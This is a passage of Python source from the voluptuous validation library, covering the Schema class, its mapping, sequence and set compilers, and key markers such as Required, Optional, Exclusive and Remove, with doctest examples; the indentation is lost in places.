'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
    """Falsy sentinel type for "no value supplied" (see UNDEFINED below)."""

    def __bool__(self):
        # The sentinel must be falsy. The original defined only the
        # Python 2 __nonzero__ hook, which Python 3 ignores, making
        # UNDEFINED unexpectedly truthy on Python 3.
        return False

    # Python 2 truthiness hook, kept for the py2 compatibility this
    # module otherwise maintains.
    __nonzero__ = __bool__

    def __repr__(self):
        return '...'


# Module-wide singleton used as "no default/no value" marker.
UNDEFINED = Undefined()
def Self():
    # Placeholder marker for recursive schemas: Schema._compile
    # special-cases the Self object itself, so this function body is
    # unreachable in normal use.
    raise er.SchemaError('"Self" should never be called')
def default_factory(value):
    """Normalize a default into a zero-argument factory.

    Callables and the UNDEFINED sentinel pass through untouched; any
    other value is wrapped in a lambda that returns it.
    """
    passthrough = value is UNDEFINED or callable(value)
    if passthrough:
        return value
    return lambda: value
@contextmanager
def raises(exc, msg=None, regex=None):
    """Context manager asserting that the body raises ``exc``.

    :param exc: exception type (or tuple of types) the body must raise.
    :param msg: if given, the exception's str() must equal it exactly.
    :param regex: if given, the exception's str() must match this pattern.
    :raises AssertionError: if the body does not raise ``exc``, or a
        message/regex check fails.
    """
    try:
        yield
    except exc as e:
        if msg is not None:
            assert str(e) == msg, '%r != %r' % (str(e), msg)
        if regex is not None:
            assert re.search(regex, str(e)), '%r does not match %r' % (str(e), regex)
    else:
        # The original silently succeeded when nothing was raised, which
        # let broken "must fail" doctests pass vacuously.
        raise AssertionError('%r not raised' % (exc,))
def Extra(_):
    """Allow keys in the data that are not present in the schema."""
    # Sentinel only: Schema._compile short-circuits on the Extra object
    # itself, so this body is unreachable in normal use.
    raise er.SchemaError('"Extra" should never be called')


# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
    """Create a new Schema.

    :param schema: Validation schema. See :module:`voluptuous` for details.
    :param required: Keys defined in the schema must be in the data.
    :param extra: Specify how extra keys in the data are treated:
        - :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
          extra keys (raise ``Invalid``).
        - :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
          keys in the output.
        - :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
          from the output.
        - Any value other than the above defaults to
          :const:`~voluptuous.PREVENT_EXTRA`
    """
    self.schema = schema
    self.required = required
    self.extra = int(extra)  # ensure the value is an integer
    # Compile once, eagerly; __call__ reuses the compiled closure, and
    # any schema errors surface at construction time rather than on
    # first validation.
    self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
    # Two Schemas compare equal iff their raw (uncompiled) schema trees
    # do; the `required`/`extra` flags deliberately do not participate.
    if not isinstance(other, Schema):
        return False
    return other.schema == self.schema

def __ne__(self, other):
    return not (self == other)

def __str__(self):
    return str(self.schema)

def __repr__(self):
    return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
        self.schema, self._extra_to_name.get(self.extra, '??'),
        self.required, id(self))
def __call__(self, data):
    """Validate data against this schema.

    Returns the validated (possibly coerced) data; raises
    ``er.MultipleInvalid`` on failure.
    """
    try:
        return self._compiled([], data)
    except er.MultipleInvalid:
        raise
    except er.Invalid as e:
        # Normalize single errors so callers always see MultipleInvalid.
        raise er.MultipleInvalid([e])
    # return self.validate([], self.schema, data)
def _compile(self, schema):
    # Dispatch on the schema node's kind and return a validator closure
    # with signature (path, data) -> validated_data.
    if schema is Extra:
        # Catch-all: accept the value unchanged.
        return lambda _, v: v
    if schema is Self:
        # Recursive reference back to this (outermost) schema.
        return lambda p, v: self._compiled(p, v)
    elif hasattr(schema, "__voluptuous_compile__"):
        # Objects may supply their own compilation hook.
        return schema.__voluptuous_compile__(self)
    if isinstance(schema, Object):
        return self._compile_object(schema)
    if isinstance(schema, _Mapping):
        return self._compile_dict(schema)
    elif isinstance(schema, list):
        return self._compile_list(schema)
    elif isinstance(schema, tuple):
        return self._compile_tuple(schema)
    elif isinstance(schema, (frozenset, set)):
        return self._compile_set(schema)
    type_ = type(schema)
    if inspect.isclass(schema):
        type_ = schema
    # Plain values, builtin types and callables all compile to scalar
    # validators.
    if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
                 list, dict, type(None)) or callable(schema):
        return _compile_scalar(schema)
    raise er.SchemaError('unsupported schema data type %r' %
                         type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
    """Validate a tuple.

    A tuple is a sequence of valid values or validators tried in order.

    >>> validator = Schema(('one', 'two', int))
    >>> validator(('one',))
    ('one',)

    >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
    ...   validator((3.5,))

    >>> validator((1,))
    (1,)
    """
    # Delegates to the shared sequence compiler with tuple as the type.
    return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
    """Validate a list.

    A list is a sequence of valid values or validators tried in order.

    >>> validator = Schema(['one', 'two', int])
    >>> validator(['one'])
    ['one']

    >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
    ...   validator([3.5])

    >>> validator([1])
    [1]
    """
    # Delegates to the shared sequence compiler with list as the type.
    return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
"""A scalar value.
The schema can either be a value or a type.
>>> _compile_scalar(int)([], 1)
1
>>> with raises(er.Invalid, 'expected float'):
... _compile_scalar(float)([], '1')
Callables have
>>> _compile_scalar(lambda v: float(v))([], '1')
1.0
As a convenience, ValueError's are trapped:
>>> with raises(er.Invalid, 'not a valid value'):
... _compile_scalar(lambda v: float(v))([], 'a')
"""
if inspect.isclass(schema):
def validate_instance(path, data):
if isinstance(data, schema):
return data
else:
msg = 'expected %s' % schema.__name__
raise er.TypeInvalid(msg, path)
return validate_instance
if callable(schema):
def validate_callable(path, data):
try:
return schema(data)
except ValueError as e:
raise er.ValueInvalid('not a valid value', path)
except er.Invalid as e:
e.prepend(path)
raise
return validate_callable
def validate_value(path, data):
if data != schema:
raise er.ScalarInvalid('not a valid value', path)
return data
return validate_value
def _compile_itemsort():
    '''return sort function of mappings'''
    def is_extra(key_):
        return key_ is Extra

    def is_remove(key_):
        return isinstance(key_, Remove)

    def is_marker(key_):
        return isinstance(key_, Marker)

    def is_type(key_):
        return inspect.isclass(key_)

    def is_callable(key_):
        return callable(key_)

    # priority list for map sorting (in order of checking)
    # We want Extra to match last, because it's a catch-all. On the other hand,
    # Remove markers should match first (since invalid values will not
    # raise an Error, instead the validator will check if other schemas match
    # the same value).
    # NOTE: list order decides which predicate wins when several match —
    # classes are also callable, so is_type is deliberately tested before
    # is_callable even though its priority number (4) is higher.
    priority = [(1, is_remove),    # Remove highest priority after values
                (2, is_marker),    # then other Markers
                (4, is_type),      # types/classes lowest before Extra
                (3, is_callable),  # callables after markers
                (5, is_extra)]     # Extra lowest priority

    def item_priority(item_):
        key_ = item_[0]
        for i, check_ in priority:
            if check_(key_):
                return i
        # literal values have the highest priority of all (sort first)
        return 0

    return item_priority
# Singleton key-ordering function shared by all mapping compilations.
_sort_item = _compile_itemsort()


def _iterate_mapping_candidates(schema):
    """Iterate over schema in a meaningful order."""
    # Without this, Extra might appear first in the iterator, and fail to
    # validate a key even though it's a Required that has its own validation,
    # generating a false positive.
    return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
    """Return iterator over object attributes. Respect objects with
    defined __slots__.

    Yields (name, value) pairs from the instance __dict__ (or _asdict()
    for namedtuples), then from __slots__ attributes if present.
    """
    d = {}
    try:
        d = vars(obj)
    except TypeError:
        # vars() raises TypeError for objects without a __dict__;
        # maybe we have named tuple here?
        if hasattr(obj, '_asdict'):
            d = obj._asdict()
    for item in iteritems(d):
        yield item
    try:
        slots = obj.__slots__
    except AttributeError:
        pass
    else:
        # __slots__ attributes live outside __dict__, so yield them too
        # (skipping the '__dict__' entry some classes list defensively).
        for key in slots:
            if key != '__dict__':
                yield (key, getattr(obj, key))
class Msg(object):
    """Report a user-friendly message if a schema fails to validate.

    >>> validate = Schema(
    ...   Msg(['one', 'two', int],
    ...       'should be one of "one", "two" or an integer'))
    >>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
    ...   validate(['three'])

    Messages are only applied to invalid direct descendants of the schema:

    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
    >>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
    ...   validate([['three']])

    The type which is thrown can be overridden but needs to be a subclass of Invalid

    >>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
    ...   validate = Schema(Msg([int], 'should be int', cls=KeyError))

    If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)

    >>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
    >>> try:
    ...   validate(['three'])
    ... except er.MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], er.RangeInvalid)
    """

    def __init__(self, schema, msg, cls=None):
        if cls and not issubclass(cls, er.Invalid):
            raise er.SchemaError("Msg can only use subclases of"
                                 " Invalid as custom class")
        # Keep both the raw schema (for repr) and the compiled Schema.
        self._schema = schema
        self.schema = Schema(schema)
        self.msg = msg
        self.cls = cls

    def __call__(self, v):
        try:
            return self.schema(v)
        except er.Invalid as e:
            if len(e.path) > 1:
                # Deep (nested) errors keep their own, more specific
                # message; only direct failures get the custom one.
                raise e
            else:
                raise (self.cls or er.Invalid)(self.msg)

    def __repr__(self):
        return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
    """Indicate that we should work with attributes, not keys."""

    def __init__(self, schema, cls=UNDEFINED):
        # Optional expected class of validated instances; UNDEFINED means
        # any object type is accepted.
        self.cls = cls
        super(Object, self).__init__(schema)
class VirtualPathComponent(str):
    """Synthetic path element (e.g. an exclusion-group label) rendered in
    angle brackets to distinguish it from real data keys."""

    def __str__(self):
        # Concatenate via join to avoid re-invoking __str__ recursively.
        return ''.join(('<', self, '>'))

    def __repr__(self):
        return str(self)
# Markers.py
class Marker(object):
    """Mark nodes for special treatment.

    Wraps a schema node and delegates validation to it; subclasses
    (Optional, Required, Remove, Exclusive, ...) change how Schema treats
    the marked key.
    """

    def __init__(self, schema_, msg=None, description=None):
        self.schema = schema_
        self._schema = Schema(schema_)
        self.msg = msg
        self.description = description

    def __call__(self, v):
        try:
            return self._schema(v)
        except er.Invalid as e:
            if not self.msg or len(e.path) > 1:
                # No custom message, or the error is nested: propagate as-is.
                raise
            raise er.Invalid(self.msg)

    def __str__(self):
        return str(self.schema)

    def __repr__(self):
        return repr(self.schema)

    def __lt__(self, other):
        # Compare by wrapped schema so markers sort alongside plain keys.
        if isinstance(other, Marker):
            return self.schema < other.schema
        return self.schema < other

    def __hash__(self):
        # Hash/equality delegate to the wrapped schema, letting e.g.
        # Required('x') match the plain key 'x' in dict lookups.
        return hash(self.schema)

    def __eq__(self, other):
        return self.schema == other

    def __ne__(self, other):
        return not(self.schema == other)
class Optional(Marker):
    """Mark a node in the schema as optional, and optionally provide a default

    >>> schema = Schema({Optional('key'): str})
    >>> schema({})
    {}
    >>> schema = Schema({Optional('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Optional('key', default=list): list})
    >>> schema({})
    {'key': []}

    If 'required' flag is set for an entire schema, optional keys aren't required

    >>> schema = Schema({
    ...    Optional('key'): str,
    ...    'key2': str
    ... }, required=True)
    >>> schema({'key2':'value'})
    {'key2': 'value'}
    """

    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Optional, self).__init__(schema, msg=msg,
                                       description=description)
        # Normalized to a zero-argument callable (or UNDEFINED sentinel)
        # so each validation run gets a fresh default value.
        self.default = default_factory(default)
class Exclusive(Optional):
    """Mark a node in the schema as exclusive.

    Exclusive keys inherited from Optional:

    >>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
    >>> schema({'alpha': 30})
    {'alpha': 30}

    Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:

    >>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
    ...   schema({'alpha': 30, 'beta': 45})

    For example, API can provides multiple types of authentication, but only one works in the same time:

    >>> msg = 'Please, use only one type of authentication at the same time.'
    >>> schema = Schema({
    ... Exclusive('classic', 'auth', msg=msg):{
    ...     Required('email'): basestring,
    ...     Required('password'): basestring
    ... },
    ... Exclusive('internal', 'auth', msg=msg):{
    ...     Required('secret_key'): basestring
    ... },
    ... Exclusive('social', 'auth', msg=msg):{
    ...     Required('social_network'): basestring,
    ...     Required('token'): basestring
    ... }
    ... })

    >>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
    ...   schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
    ...           'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
    """

    def __init__(self, schema, group_of_exclusion, msg=None, description=None):
        super(Exclusive, self).__init__(schema, msg=msg,
                                        description=description)
        # Keys sharing this group label are mutually exclusive; the check
        # is enforced by Schema._compile_dict at validation time.
        self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
    """ Mark a node in the schema as inclusive.

    Inclusive keys inherited from Optional:

    >>> schema = Schema({
    ...     Inclusive('filename', 'file'): str,
    ...     Inclusive('mimetype', 'file'): str
    ... })
    >>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
    >>> data == schema(data)
    True

    Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:

    >>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
    ...     schema({'filename': 'dog.jpg'})

    If none of the keys in the group are present, it is accepted:

    >>> schema({})
    {}

    For example, API can return 'height' and 'width' together, but not separately.

    >>> msg = "Height and width must exist together"
    >>> schema = Schema({
    ...     Inclusive('height', 'size', msg=msg): int,
    ...     Inclusive('width', 'size', msg=msg): int
    ... })

    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'height': 100})

    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'width': 100})

    >>> data = {'height': 100, 'width': 100}
    >>> data == schema(data)
    True
    """

    def __init__(self, schema, group_of_inclusion,
                 msg=None, description=None, default=UNDEFINED):
        super(Inclusive, self).__init__(schema, msg=msg,
                                        default=default,
                                        description=description)
        # Keys sharing this group label must appear together (all or none);
        # enforced by Schema._compile_dict.
        self.group_of_inclusion = group_of_inclusion
class Required(Marker):
    """Mark a node in the schema as being required, and optionally provide a default value.

    >>> schema = Schema({Required('key'): str})
    >>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
    ...   schema({})

    >>> schema = Schema({Required('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Required('key', default=list): list})
    >>> schema({})
    {'key': []}
    """

    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        super(Required, self).__init__(schema, msg=msg,
                                       description=description)
        # default may be a plain value or a factory; normalise via
        # default_factory (UNDEFINED means "no default").
        self.default = default_factory(default)
class Remove(Marker):
    """Mark a node in the schema to be removed and excluded from the validated
    output. Keys that fail validation will not raise ``Invalid``. Instead, these
    keys will be treated as extras.

    >>> schema = Schema({str: int, Remove(int): str})
    >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
    ...    schema({'keep': 1, 1: 1.0})
    >>> schema({1: 'red', 'red': 1, 2: 'green'})
    {'red': 1}
    >>> schema = Schema([int, Remove(float), Extra])
    >>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
    [1, 2, 3, 5, '7']
    """

    def __call__(self, v):
        super(Remove, self).__call__(v)
        # Returning the class itself (not the validated value) is the
        # sentinel the mapping/sequence validators use to drop this entry.
        return self.__class__

    def __repr__(self):
        return "Remove(%r)" % (self.schema,)

    def __hash__(self):
        # Identity hash (not the wrapped schema's hash) so each Remove
        # marker is a distinct dict key.
        return object.__hash__(self)
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
def validate(*a, **kw):
    """Decorator for validating arguments of a function against a given schema.

    Set restrictions for arguments:

    >>> @validate(arg1=int, arg2=int)
    ... def foo(arg1, arg2):
    ...   return arg1 * arg2

    Set restriction for returned value:

    >>> @validate(arg=int, __return__=int)
    ... def bar(arg1):
    ...   return arg1 * 2
    """
    # The reserved '__return__' key holds the schema for the return value.
    RETURNS_KEY = '__return__'

    def validate_schema_decorator(func):
        returns_defined = False
        returns = None
        # Positional schema arguments are matched to the decorated
        # function's parameter names, then merged with keyword schemas.
        schema_args_dict = _args_to_dict(func, a)
